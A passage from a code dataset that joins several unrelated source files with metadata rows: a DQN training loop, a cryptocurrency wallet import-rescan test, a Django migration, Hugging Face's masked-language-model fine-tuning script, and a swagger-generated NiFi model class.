total_max_q += q_values.max()
game_length += 1
if done:
mean_max_q = total_max_q / game_length
total_max_q = 0.0
game_length = 0
if iteration > training_start and iteration % args.learn_iterations == 0:
# only train after warmup period and at regular intervals
# Sample memories and use the target DQN to produce the target Q-Value
X_state_val, X_action_val, rewards, X_next_state_val, continues = (sample_memories(batch_size))
next_q_values = target_q_values.eval(feed_dict={X_state: X_next_state_val})
max_next_q_values = np.max(next_q_values, axis=1, keepdims=True)
y_val = rewards + continues * discount_rate * max_next_q_values
# Train the online DQN
_, loss_val = sess.run([training_op, loss], feed_dict={X_state: X_state_val, X_action: X_action_val, y: y_val})
loss_list[step] = loss_val
# Regularly copy the online DQN to the target DQN
if step % args.copy_steps == 0:
copy_online_to_target.run()
# And save regularly
if step % args.save_steps == 0:
saver.save(sess, args.path)
plt.plot(np.arange(args.number_steps), loss_list)
    plt.savefig('./MountainCar-v0/loss_chart.png')
| 38.820598 | 123 | 0.653059 |
ab09950d7f6955e84d0ecf8c7fc0aa0c515b90d8 | 8,481 | py | Python | test/functional/wallet_import_rescan.py | reeccoin/REEC | eb388d692aa7039dfe78247c829e4d348ff1f631 | ["MIT"] | 2 | 2020-11-28T13:09:16.000Z | 2020-12-05T21:01:07.000Z | test/functional/wallet_import_rescan.py | reeccoin/REEC | eb388d692aa7039dfe78247c829e4d348ff1f631 | ["MIT"] | null | null | null | test/functional/wallet_import_rescan.py | reeccoin/REEC | eb388d692aa7039dfe78247c829e4d348ff1f631 | ["MIT"] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2014-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test wallet import RPCs.
Test rescan behavior of importaddress, importpubkey, importprivkey, and
importmulti RPCs with different types of keys and rescan options.
In the first part of the test, node 0 creates an address for each type of
import RPC call and sends BTC to it. Then other nodes import the addresses,
and the test makes listtransactions and getbalance calls to confirm that the
importing node either did or did not execute rescans picking up the send
transactions.
In the second part of the test, node 0 sends more BTC to each address, and the
test makes more listtransactions and getbalance calls to confirm that the
importing nodes pick up the new transactions regardless of whether rescans
happened previously.
"""
from test_framework.test_framework import ReeccoinTestFramework
from test_framework.util import (assert_raises_rpc_error, connect_nodes, sync_blocks, assert_equal, set_node_times)
import collections
import enum
import itertools
Call = enum.Enum("Call", "single")
Data = enum.Enum("Data", "address pub priv")
Rescan = enum.Enum("Rescan", "no yes late_timestamp")
class Variant(collections.namedtuple("Variant", "call data rescan prune")):
"""Helper for importing one key and verifying scanned transactions."""
def try_rpc(self, func, *args, **kwargs):
if self.expect_disabled:
assert_raises_rpc_error(-4, "Rescan is disabled in pruned mode", func, *args, **kwargs)
else:
return func(*args, **kwargs)
def do_import(self, timestamp):
"""Call one key import RPC."""
rescan = self.rescan == Rescan.yes
if self.call == Call.single:
if self.data == Data.address:
response = self.try_rpc(self.node.importaddress, self.address["address"], self.label, rescan)
elif self.data == Data.pub:
response = self.try_rpc(self.node.importpubkey, self.address["pubkey"], self.label, rescan)
elif self.data == Data.priv:
response = self.try_rpc(self.node.importprivkey, self.key, self.label, rescan)
assert_equal(response, None)
elif self.call == Call.multi:
response = self.node.importmulti([{
"scriptPubKey": {
"address": self.address["address"]
},
"timestamp": timestamp + TIMESTAMP_WINDOW + (1 if self.rescan == Rescan.late_timestamp else 0),
"pubkeys": [self.address["pubkey"]] if self.data == Data.pub else [],
"keys": [self.key] if self.data == Data.priv else [],
"label": self.label,
"watchonly": self.data != Data.priv
}], {"rescan": self.rescan in (Rescan.yes, Rescan.late_timestamp)})
assert_equal(response, [{"success": True}])
    def check(self, txid=None, amount=None, confirmations=None):
        """Verify that listreceivedbyaddress returns the expected values."""
addresses = self.node.listreceivedbyaddress(0, True, self.address['address'])
if self.expected_txs:
assert_equal(len(addresses[0]["txids"]), self.expected_txs)
if txid is not None:
address, = [ad for ad in addresses if txid in ad["txids"]]
assert_equal(address["address"], self.address["address"])
assert_equal(address["amount"], self.expected_balance)
assert_equal(address["confirmations"], confirmations)
# Verify the transaction is correctly marked watchonly depending on
# whether the transaction pays to an imported public key or
# imported private key. The test setup ensures that transaction
# inputs will not be from watchonly keys (important because
# involvesWatchonly will be true if either the transaction output
# or inputs are watchonly).
if self.data != Data.priv:
assert_equal(address["involvesWatchonly"], True)
else:
assert_equal("involvesWatchonly" not in address, True)
# List of Variants for each way a key or address could be imported.
IMPORT_VARIANTS = [Variant(*variants) for variants in itertools.product(Call, Data, Rescan, (False, True))]
# List of nodes to import keys to. Half the nodes will have pruning disabled,
# half will have it enabled. Different nodes will be used for imports that are
# expected to cause rescans, and imports that are not expected to cause
# rescans, in order to prevent rescans during later imports picking up
# transactions associated with earlier imports. This makes it easier to keep
# track of expected balances and transactions.
ImportNode = collections.namedtuple("ImportNode", "prune rescan")
IMPORT_NODES = [ImportNode(*fields) for fields in itertools.product((False, True), repeat=2)]
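# itertools.product((False, True), repeat=2) yields four importing nodes, one per
# (prune, rescan) combination, so the test runs num_nodes = 2 + 4 = 6 nodes in total.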
# Rescans start at the earliest block up to 2 hours before the key timestamp.
TIMESTAMP_WINDOW = 2 * 60 * 60
class ImportRescanTest(ReeccoinTestFramework):
def set_test_params(self):
self.num_nodes = 2 + len(IMPORT_NODES)
def setup_network(self):
extra_args = [["-addresstype=legacy",] for _ in range(self.num_nodes)]
for i, import_node in enumerate(IMPORT_NODES, 2):
if import_node.prune:
extra_args[i] += ["-prune=1"]
self.add_nodes(self.num_nodes, extra_args)
self.start_nodes()
for i in range(1, self.num_nodes):
connect_nodes(self.nodes[i], 0)
def run_test(self):
# Create one transaction on node 0 with a unique amount for
# each possible type of wallet import RPC.
for i, variant in enumerate(IMPORT_VARIANTS):
variant.address = self.nodes[1].validateaddress(self.nodes[1].getnewaddress())
variant.key = self.nodes[1].dumpprivkey(variant.address["address"])
variant.initial_amount = 10 - (i + 1) / 4.0
variant.initial_txid = self.nodes[0].sendtoaddress(variant.address["address"], variant.initial_amount)
# Generate a block containing the initial transactions, then another
# block further in the future (past the rescan window).
self.nodes[0].generate(1)
assert_equal(self.nodes[0].getrawmempool(), [])
timestamp = self.nodes[0].getblockheader(self.nodes[0].getbestblockhash())["time"]
set_node_times(self.nodes, timestamp + TIMESTAMP_WINDOW + 1)
self.nodes[0].generate(1)
sync_blocks(self.nodes)
# For each variation of wallet key import, invoke the import RPC and
# check the results from getbalance and listtransactions.
for variant in IMPORT_VARIANTS:
variant.expect_disabled = variant.rescan == Rescan.yes and variant.prune and variant.call == Call.single
expect_rescan = variant.rescan == Rescan.yes and not variant.expect_disabled
variant.node = self.nodes[2 + IMPORT_NODES.index(ImportNode(variant.prune, expect_rescan))]
variant.do_import(timestamp)
if expect_rescan:
variant.expected_balance = variant.initial_amount
variant.expected_txs = 1
variant.check(variant.initial_txid, variant.initial_amount, 2)
else:
variant.expected_balance = 0
variant.expected_txs = 0
variant.check()
# Create new transactions sending to each address.
for i, variant in enumerate(IMPORT_VARIANTS):
variant.sent_amount = 10 - (2 * i + 1) / 8.0
variant.sent_txid = self.nodes[0].sendtoaddress(variant.address["address"], variant.sent_amount)
# Generate a block containing the new transactions.
self.nodes[0].generate(1)
assert_equal(self.nodes[0].getrawmempool(), [])
sync_blocks(self.nodes)
# Check the latest results from getbalance and listtransactions.
for variant in IMPORT_VARIANTS:
if not variant.expect_disabled:
variant.expected_balance += variant.sent_amount
variant.expected_txs += 1
variant.check(variant.sent_txid, variant.sent_amount, 1)
else:
variant.check()
if __name__ == "__main__":
ImportRescanTest().main()
| 47.379888 | 116 | 0.666431 |
3a2950318764046c328bae914582abfee31aa3e2 | 445 | py | Python | apps/exams/migrations/0010_auto_20200410_1559.py | alfarhanzahedi/edumate | 76ced0063d25431098babb1d163c95c9ddaf3307 | ["MIT"] | 1 | 2021-11-28T14:18:16.000Z | 2021-11-28T14:18:16.000Z | apps/exams/migrations/0010_auto_20200410_1559.py | alfarhanzahedi/edumate | 76ced0063d25431098babb1d163c95c9ddaf3307 | ["MIT"] | 1 | 2022-02-10T10:53:12.000Z | 2022-02-10T10:53:12.000Z | apps/exams/migrations/0010_auto_20200410_1559.py | alfarhanzahedi/edumate | 76ced0063d25431098babb1d163c95c9ddaf3307 | ["MIT"] | null | null | null |
# Generated by Django 2.2.8 on 2020-04-10 15:59
import ckeditor_uploader.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('exams', '0009_auto_20200410_1526'),
]
operations = [
migrations.AlterField(
model_name='answer',
name='body',
field=ckeditor_uploader.fields.RichTextUploadingField(blank=True, null=True),
),
]
| 22.25 | 89 | 0.640449 |
9c9b0c088becdb658f77557dc352e8951ef478fd | 86 | py | Python | lanfactory/__init__.py | AlexanderFengler/LANfactory | 78570d488c64907ef7dcf2161581a03746d0e45b | ["MIT"] | 1 | 2021-07-15T03:49:28.000Z | 2021-07-15T03:49:28.000Z | lanfactory/__init__.py | AlexanderFengler/LANfactory | 78570d488c64907ef7dcf2161581a03746d0e45b | ["MIT"] | null | null | null | lanfactory/__init__.py | AlexanderFengler/LANfactory | 78570d488c64907ef7dcf2161581a03746d0e45b | ["MIT"] | null | null | null |
__version__ = '0.0.2'
from . import config
from . import trainers
from . import utils
| 17.2 | 22 | 0.732558 |
bbcced59a030fde0ab77438bbf6a9c57daa000d4 | 24,177 | py | Python | examples/pytorch/language-modeling/run_mlm.py | InfluencerNGZK/transformers | 33080a0a29f849649ade9ef351d5744b5b0ddefe | ["Apache-2.0"] | null | null | null | examples/pytorch/language-modeling/run_mlm.py | InfluencerNGZK/transformers | 33080a0a29f849649ade9ef351d5744b5b0ddefe | ["Apache-2.0"] | null | null | null | examples/pytorch/language-modeling/run_mlm.py | InfluencerNGZK/transformers | 33080a0a29f849649ade9ef351d5744b5b0ddefe | ["Apache-2.0"] | null | null | null |
#!/usr/bin/env python
# coding=utf-8
# Copyright 2020 The HuggingFace Team All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for masked language modeling (BERT, ALBERT, RoBERTa...) on a text file or a dataset.
Here is the full list of checkpoints on the hub that can be fine-tuned by this script:
https://huggingface.co/models?filter=masked-lm
"""
# You can also adapt this script on your own masked language modeling task. Pointers for this are left as comments.
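# Example invocation (illustrative; the model checkpoint and dataset names are
# placeholders, any masked-LM checkpoint and text dataset work):
#   python run_mlm.py \
#       --model_name_or_path roberta-base \
#       --dataset_name wikitext \
#       --dataset_config_name wikitext-2-raw-v1 \
#       --do_train --do_eval \
#       --output_dir /tmp/test-mlm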
import logging
import math
import os
import sys
from dataclasses import dataclass, field
from typing import Optional
import datasets
from datasets import load_dataset
import transformers
from transformers import (
CONFIG_MAPPING,
MODEL_FOR_MASKED_LM_MAPPING,
AutoConfig,
AutoModelForMaskedLM,
AutoTokenizer,
DataCollatorForLanguageModeling,
HfArgumentParser,
Trainer,
TrainingArguments,
set_seed,
)
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import check_min_version
from transformers.utils.versions import require_version
# Will error if the minimal version of Transformers is not installed. Remove at your own risks.
check_min_version("4.12.0")
require_version("datasets>=1.8.0", "To fix: pip install -r examples/pytorch/language-modeling/requirements.txt")
logger = logging.getLogger(__name__)
MODEL_CONFIG_CLASSES = list(MODEL_FOR_MASKED_LM_MAPPING.keys())
MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch.
"""
model_name_or_path: Optional[str] = field(
default=None,
metadata={
"help": "The model checkpoint for weights initialization."
"Don't set if you want to train a model from scratch."
},
)
model_type: Optional[str] = field(
default=None,
metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)},
)
config_overrides: Optional[str] = field(
default=None,
metadata={
"help": "Override some existing default config settings when a model is trained from scratch. Example: "
"n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index"
},
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
)
use_fast_tokenizer: bool = field(
default=True,
metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."},
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
use_auth_token: bool = field(
default=False,
metadata={
"help": "Will use the token generated when running `transformers-cli login` (necessary to use this script "
"with private models)."
},
)
def __post_init__(self):
if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None):
raise ValueError(
"--config_overrides can't be used in combination with --config_name or --model_name_or_path"
)
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
dataset_name: Optional[str] = field(
default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."}
)
dataset_config_name: Optional[str] = field(
default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
)
train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a text file)."})
validation_file: Optional[str] = field(
default=None,
metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
validation_split_percentage: Optional[int] = field(
default=5,
metadata={
"help": "The percentage of the train set used as validation set in case there's no validation split"
},
)
max_seq_length: Optional[int] = field(
default=None,
metadata={
"help": "The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated."
},
)
preprocessing_num_workers: Optional[int] = field(
default=None,
metadata={"help": "The number of processes to use for the preprocessing."},
)
mlm_probability: float = field(
default=0.15, metadata={"help": "Ratio of tokens to mask for masked language modeling loss"}
)
line_by_line: bool = field(
default=False,
metadata={"help": "Whether distinct lines of text in the dataset are to be handled as distinct sequences."},
)
pad_to_max_length: bool = field(
default=False,
metadata={
"help": "Whether to pad all samples to `max_seq_length`. "
"If False, will pad the samples dynamically when batching to the maximum length in the batch."
},
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
},
)
def __post_init__(self):
if self.dataset_name is None and self.train_file is None and self.validation_file is None:
raise ValueError("Need either a dataset name or a training/validation file.")
else:
if self.train_file is not None:
extension = self.train_file.split(".")[-1]
if extension not in ["csv", "json", "txt"]:
raise ValueError("`train_file` should be a csv, a json or a txt file.")
if self.validation_file is not None:
extension = self.validation_file.split(".")[-1]
if extension not in ["csv", "json", "txt"]:
raise ValueError("`validation_file` should be a csv, a json or a txt file.")
def main():
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
handlers=[logging.StreamHandler(sys.stdout)],
)
log_level = training_args.get_process_log_level()
logger.setLevel(log_level)
datasets.utils.logging.set_verbosity(log_level)
transformers.utils.logging.set_verbosity(log_level)
transformers.utils.logging.enable_default_handler()
transformers.utils.logging.enable_explicit_format()
# Log on each process the small summary:
    logger.warning(
        f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}"
        + f", distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
)
# Set the verbosity to info of the Transformers logger (on main process only):
logger.info(f"Training/evaluation parameters {training_args}")
# Detecting last checkpoint.
last_checkpoint = None
if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir:
last_checkpoint = get_last_checkpoint(training_args.output_dir)
if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to overcome."
)
elif last_checkpoint is not None and training_args.resume_from_checkpoint is None:
logger.info(
f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change "
"the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
# Set seed before initializing model.
set_seed(training_args.seed)
# Get the datasets: you can either provide your own CSV/JSON/TXT training and evaluation files (see below)
# or just provide the name of one of the public datasets available on the hub at https://huggingface.co/datasets/
# (the dataset will be downloaded automatically from the datasets Hub
#
# For CSV/JSON files, this script will use the column called 'text' or the first column. You can easily tweak this
# behavior (see below)
#
# In distributed training, the load_dataset function guarantee that only one local process can concurrently
# download the dataset.
if data_args.dataset_name is not None:
# Downloading and loading a dataset from the hub.
raw_datasets = load_dataset(
data_args.dataset_name, data_args.dataset_config_name, cache_dir=model_args.cache_dir
)
if "validation" not in raw_datasets.keys():
raw_datasets["validation"] = load_dataset(
data_args.dataset_name,
data_args.dataset_config_name,
split=f"train[:{data_args.validation_split_percentage}%]",
cache_dir=model_args.cache_dir,
)
raw_datasets["train"] = load_dataset(
data_args.dataset_name,
data_args.dataset_config_name,
split=f"train[{data_args.validation_split_percentage}%:]",
cache_dir=model_args.cache_dir,
)
else:
data_files = {}
if data_args.train_file is not None:
data_files["train"] = data_args.train_file
extension = data_args.train_file.split(".")[-1]
if data_args.validation_file is not None:
data_files["validation"] = data_args.validation_file
extension = data_args.validation_file.split(".")[-1]
if extension == "txt":
extension = "text"
raw_datasets = load_dataset(extension, data_files=data_files, cache_dir=model_args.cache_dir)
# If no validation data is there, validation_split_percentage will be used to divide the dataset.
if "validation" not in raw_datasets.keys():
raw_datasets["validation"] = load_dataset(
extension,
data_files=data_files,
split=f"train[:{data_args.validation_split_percentage}%]",
cache_dir=model_args.cache_dir,
)
raw_datasets["train"] = load_dataset(
extension,
data_files=data_files,
split=f"train[{data_args.validation_split_percentage}%:]",
cache_dir=model_args.cache_dir,
)
# See more about loading any type of standard or custom dataset (from files, python dict, pandas DataFrame, etc) at
# https://huggingface.co/docs/datasets/loading_datasets.html.
# Load pretrained model and tokenizer
#
# Distributed training:
# The .from_pretrained methods guarantee that only one local process can concurrently
# download model & vocab.
config_kwargs = {
"cache_dir": model_args.cache_dir,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.config_name:
config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs)
elif model_args.model_name_or_path:
config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs)
else:
config = CONFIG_MAPPING[model_args.model_type]()
logger.warning("You are instantiating a new config instance from scratch.")
if model_args.config_overrides is not None:
logger.info(f"Overriding config: {model_args.config_overrides}")
config.update_from_string(model_args.config_overrides)
tokenizer_kwargs = {
"cache_dir": model_args.cache_dir,
"use_fast": model_args.use_fast_tokenizer,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.tokenizer_name:
tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs)
elif model_args.model_name_or_path:
tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, **tokenizer_kwargs)
else:
raise ValueError(
"You are instantiating a new tokenizer from scratch. This is not supported by this script."
"You can do it from another script, save it, and load it from here, using --tokenizer_name."
)
if model_args.model_name_or_path:
model = AutoModelForMaskedLM.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
else:
logger.info("Training new model from scratch")
model = AutoModelForMaskedLM.from_config(config)
model.resize_token_embeddings(len(tokenizer))
# Preprocessing the datasets.
# First we tokenize all the texts.
if training_args.do_train:
column_names = raw_datasets["train"].column_names
else:
column_names = raw_datasets["validation"].column_names
text_column_name = "text" if "text" in column_names else column_names[0]
if data_args.max_seq_length is None:
max_seq_length = tokenizer.model_max_length
if max_seq_length > 1024:
logger.warning(
f"The tokenizer picked seems to have a very large `model_max_length` ({tokenizer.model_max_length}). "
"Picking 1024 instead. You can change that default value by passing --max_seq_length xxx."
)
max_seq_length = 1024
else:
if data_args.max_seq_length > tokenizer.model_max_length:
            logger.warning(
                f"The max_seq_length passed ({data_args.max_seq_length}) is larger than the maximum length for the "
f"model ({tokenizer.model_max_length}). Using max_seq_length={tokenizer.model_max_length}."
)
max_seq_length = min(data_args.max_seq_length, tokenizer.model_max_length)
if data_args.line_by_line:
# When using line_by_line, we just tokenize each nonempty line.
padding = "max_length" if data_args.pad_to_max_length else False
def tokenize_function(examples):
# Remove empty lines
examples[text_column_name] = [
line for line in examples[text_column_name] if len(line) > 0 and not line.isspace()
]
return tokenizer(
examples[text_column_name],
padding=padding,
truncation=True,
max_length=max_seq_length,
# We use this option because DataCollatorForLanguageModeling (see below) is more efficient when it
# receives the `special_tokens_mask`.
return_special_tokens_mask=True,
)
with training_args.main_process_first(desc="dataset map tokenization"):
tokenized_datasets = raw_datasets.map(
tokenize_function,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns=[text_column_name],
load_from_cache_file=not data_args.overwrite_cache,
desc="Running tokenizer on dataset line_by_line",
)
else:
# Otherwise, we tokenize every text, then concatenate them together before splitting them in smaller parts.
# We use `return_special_tokens_mask=True` because DataCollatorForLanguageModeling (see below) is more
# efficient when it receives the `special_tokens_mask`.
def tokenize_function(examples):
return tokenizer(examples[text_column_name], return_special_tokens_mask=True)
with training_args.main_process_first(desc="dataset map tokenization"):
tokenized_datasets = raw_datasets.map(
tokenize_function,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns=column_names,
load_from_cache_file=not data_args.overwrite_cache,
desc="Running tokenizer on every text in dataset",
)
# Main data processing function that will concatenate all texts from our dataset and generate chunks of
# max_seq_length.
def group_texts(examples):
# Concatenate all texts.
concatenated_examples = {k: sum(examples[k], []) for k in examples.keys()}
total_length = len(concatenated_examples[list(examples.keys())[0]])
        # We drop the small remainder; we could add padding instead if the model supported it.
        # You can customize this part to your needs.
if total_length >= max_seq_length:
total_length = (total_length // max_seq_length) * max_seq_length
# Split by chunks of max_len.
result = {
k: [t[i : i + max_seq_length] for i in range(0, total_length, max_seq_length)]
for k, t in concatenated_examples.items()
}
return result
# Note that with `batched=True`, this map processes 1,000 texts together, so group_texts throws away a
# remainder for each of those groups of 1,000 texts. You can adjust that batch_size here but a higher value
# might be slower to preprocess.
#
# To speed up this part, we use multiprocessing. See the documentation of the map method for more information:
# https://huggingface.co/docs/datasets/package_reference/main_classes.html#datasets.Dataset.map
with training_args.main_process_first(desc="grouping texts together"):
tokenized_datasets = tokenized_datasets.map(
group_texts,
batched=True,
num_proc=data_args.preprocessing_num_workers,
load_from_cache_file=not data_args.overwrite_cache,
desc=f"Grouping texts in chunks of {max_seq_length}",
)
if training_args.do_train:
if "train" not in tokenized_datasets:
raise ValueError("--do_train requires a train dataset")
train_dataset = tokenized_datasets["train"]
if data_args.max_train_samples is not None:
train_dataset = train_dataset.select(range(data_args.max_train_samples))
if training_args.do_eval:
if "validation" not in tokenized_datasets:
raise ValueError("--do_eval requires a validation dataset")
eval_dataset = tokenized_datasets["validation"]
if data_args.max_eval_samples is not None:
eval_dataset = eval_dataset.select(range(data_args.max_eval_samples))
# Data collator
# This one will take care of randomly masking the tokens.
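    # Padding to a multiple of 8 (only needed for line-by-line data under fp16) keeps sequence lengths friendly to tensor cores.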
pad_to_multiple_of_8 = data_args.line_by_line and training_args.fp16 and not data_args.pad_to_max_length
data_collator = DataCollatorForLanguageModeling(
tokenizer=tokenizer,
mlm_probability=data_args.mlm_probability,
pad_to_multiple_of=8 if pad_to_multiple_of_8 else None,
)
# Initialize our Trainer
trainer = Trainer(
model=model,
args=training_args,
train_dataset=train_dataset if training_args.do_train else None,
eval_dataset=eval_dataset if training_args.do_eval else None,
tokenizer=tokenizer,
data_collator=data_collator,
)
# Training
if training_args.do_train:
checkpoint = None
if training_args.resume_from_checkpoint is not None:
checkpoint = training_args.resume_from_checkpoint
elif last_checkpoint is not None:
checkpoint = last_checkpoint
train_result = trainer.train(resume_from_checkpoint=checkpoint)
trainer.save_model() # Saves the tokenizer too for easy upload
metrics = train_result.metrics
max_train_samples = (
data_args.max_train_samples if data_args.max_train_samples is not None else len(train_dataset)
)
metrics["train_samples"] = min(max_train_samples, len(train_dataset))
trainer.log_metrics("train", metrics)
trainer.save_metrics("train", metrics)
trainer.save_state()
# Evaluation
if training_args.do_eval:
logger.info("*** Evaluate ***")
metrics = trainer.evaluate()
max_eval_samples = data_args.max_eval_samples if data_args.max_eval_samples is not None else len(eval_dataset)
metrics["eval_samples"] = min(max_eval_samples, len(eval_dataset))
try:
perplexity = math.exp(metrics["eval_loss"])
except OverflowError:
perplexity = float("inf")
metrics["perplexity"] = perplexity
trainer.log_metrics("eval", metrics)
trainer.save_metrics("eval", metrics)
kwargs = {"finetuned_from": model_args.model_name_or_path, "tasks": "fill-mask"}
if data_args.dataset_name is not None:
kwargs["dataset_tags"] = data_args.dataset_name
if data_args.dataset_config_name is not None:
kwargs["dataset_args"] = data_args.dataset_config_name
kwargs["dataset"] = f"{data_args.dataset_name} {data_args.dataset_config_name}"
else:
kwargs["dataset"] = data_args.dataset_name
if training_args.push_to_hub:
trainer.push_to_hub(**kwargs)
else:
trainer.create_model_card(**kwargs)
def _mp_fn(index):
# For xla_spawn (TPUs)
main()
if __name__ == "__main__":
main()
| 43.562162 | 119 | 0.667783 |
d0347cc0f904769260deaaf47c29c9bd6df1f67c | 3,541 | py | Python | nipyapi/nifi/models/drop_request_entity.py | iMajna/nipyapi | 5480af8fe8c6b470249837835cb1a067abb6678e | ["Apache-2.0"] | null | null | null | nipyapi/nifi/models/drop_request_entity.py | iMajna/nipyapi | 5480af8fe8c6b470249837835cb1a067abb6678e | ["Apache-2.0"] | 1 | 2020-03-16T10:02:46.000Z | 2020-03-16T13:37:42.000Z | nipyapi/nifi/models/drop_request_entity.py | iMajna/nipyapi | 5480af8fe8c6b470249837835cb1a067abb6678e | ["Apache-2.0"] | null | null | null | # coding: utf-8
"""
NiFi Rest Api
The Rest Api provides programmatic access to command and control a NiFi instance in real time. Start and stop processors, monitor queues, query provenance data, and more. Each endpoint below includes a description, definitions of the expected input and output, potential response codes, and the authorizations required to invoke each service.
OpenAPI spec version: 1.12.1
Contact: dev@nifi.apache.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class DropRequestEntity(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'drop_request': 'DropRequestDTO'
}
attribute_map = {
'drop_request': 'dropRequest'
}
def __init__(self, drop_request=None):
"""
DropRequestEntity - a model defined in Swagger
"""
self._drop_request = None
if drop_request is not None:
self.drop_request = drop_request
@property
def drop_request(self):
"""
Gets the drop_request of this DropRequestEntity.
:return: The drop_request of this DropRequestEntity.
:rtype: DropRequestDTO
"""
return self._drop_request
@drop_request.setter
def drop_request(self, drop_request):
"""
Sets the drop_request of this DropRequestEntity.
:param drop_request: The drop_request of this DropRequestEntity.
:type: DropRequestDTO
"""
self._drop_request = drop_request
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, DropRequestEntity):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 28.556452 | 479 | 0.556622 |
0e7c9f3574619d899ba3d12f44f8c3a9ea0c8558 | 64,044 | py | Python | test/functional/feature_block.py | LOUD-Mining/WhatCoin | 867630c222dfc7643fe13c1ec69ae187210f157d | ["MIT"] | null | null | null | test/functional/feature_block.py | LOUD-Mining/WhatCoin | 867630c222dfc7643fe13c1ec69ae187210f157d | ["MIT"] | null | null | null | test/functional/feature_block.py | LOUD-Mining/WhatCoin | 867630c222dfc7643fe13c1ec69ae187210f157d | ["MIT"] | 1 | 2021-04-22T05:44:57.000Z | 2021-04-22T05:44:57.000Z | #!/usr/bin/env python3
# Copyright (c) 2015-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test block processing."""
import copy
